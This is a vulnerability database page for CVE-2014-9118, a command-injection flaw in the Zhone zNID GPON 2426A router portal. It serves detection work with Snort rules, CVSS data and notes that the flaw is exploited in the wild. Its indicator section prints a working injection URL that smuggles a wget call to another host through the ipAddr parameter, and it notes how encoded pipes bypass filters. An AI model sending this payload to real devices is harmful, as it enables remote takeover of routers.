cbcvebase.
CVE-2014-9118
published 2017-10-17

CVE-2014-9118: The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the…

PriorityP186high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
53.36%
98.9th percentile
The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the ipAddr parameter to zhnping.cmd.

Detection & IOCsextracted from sources · hover to see the quote

url/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3
path/zhnping.cmd
snort
ET EXPLOIT Zhone ZNID GPON 2426A any any (msg:"ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M1"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/zhnping.cmd?"; fast_pattern; content:"test=ping"; content:"sessionKey="; content:"ipAddr="; pcre:"/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,www.exploit-db.com/exploits/38453; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2014-9118; classtype:attempted-admin; sid:2036749; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2014_9118, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_06_23, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
ET EXPLOIT Zhone ZNID GPON 2426A any any (msg:"ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M2"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/zhnping.cmd?"; fast_pattern; content:"test=traceroute"; content:"sessionKey="; content:"ipAddr="; pcre:"/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,www.exploit-db.com/exploits/38453; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2014-9118; classtype:attempted-admin; sid:2036750; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2014_9118, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_06_23, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • The Snort PCRE pattern for detecting shell metacharacter injection in the `ipAddr` parameter is: `/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri` — match against the value of `ipAddr=` in the URI.
  • Exploit has been observed in the wild as part of EnemyBot IoT malware campaigns targeting public-facing devices.
  • The exploit PoC uses URL-encoded shell metacharacters such as `%7c` (pipe) to bypass naive input filters in the `ipAddr` parameter.
  • ·The exploit requires a valid `sessionKey` in the request. Low-privileged authenticated users (not just admins) can trigger the RCE, as the web portal only enforces access control client-side via JavaScript.
  • ·The vulnerability affects Zhone zNID GPON 2426A firmware versions before S3.0.501. Detection rules should be scoped to devices running versions prior to this.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.